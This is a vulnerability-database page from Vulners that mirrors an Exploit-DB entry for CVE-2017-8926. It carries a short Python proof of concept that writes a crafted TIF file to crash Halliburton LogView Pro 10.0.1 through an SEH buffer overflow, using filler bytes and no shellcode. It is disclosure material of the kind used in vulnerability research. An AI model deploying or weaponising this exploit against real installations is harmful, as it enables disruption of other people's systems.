Lucene search
K

Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)

🗓️ 14 May 2017 00:00:00Reported by Muhann4dType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Halliburton LogView Pro 10.0.1 local buffer overflow (SEH) exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH) Exploit
15 May 201700:00
zdt
Circl
CVE-2017-8926
14 May 201700:00
circl
CNVD
Halliburton LogView Pro Buffer Overflow Vulnerability
17 May 201700:00
cnvd
CVE
CVE-2017-8926
15 May 201718:00
cve
Cvelist
CVE-2017-8926
15 May 201718:00
cvelist
EUVD
EUVD-2017-17866
7 Oct 202500:30
euvd
exploitpack
Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)
14 May 201700:00
exploitpack
NVD
CVE-2017-8926
15 May 201718:29
nvd
Prion
Buffer overflow
15 May 201718:29
prion
#!/usr/bin/python
# Exploit Title     : Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)
# Date              : 2017-05-14
# Exploit Author    : Muhann4d
# CVE               : CVE-2017-8926
# Vendor Homepage   : http://www.halliburton.com
# Software Link     : http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe
# Affected Versions : 10.0.1   
# Category          : Denial of Service (DoS) Local
# Tested on OS      : Windows 7 Professional SP1 32bit
# Proof of Concept  : run the exploit, open the poc.tif file with the Halliburton LogView Pro 10.0.1

# Vendor has been cantacted but no reply.

buf = "\x41" * 848
buff = "\x42" * 4
bufff = "\x43" * 4
buffff = "\x44" * 9999
f = open ("poc.tif", "w")
f.write(buf + buff + bufff + buffff)
f.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 May 2017 00:00Current
7High risk
Vulners AI Score7
CVSS 26.8
CVSS 37.8
EPSS0.01119
34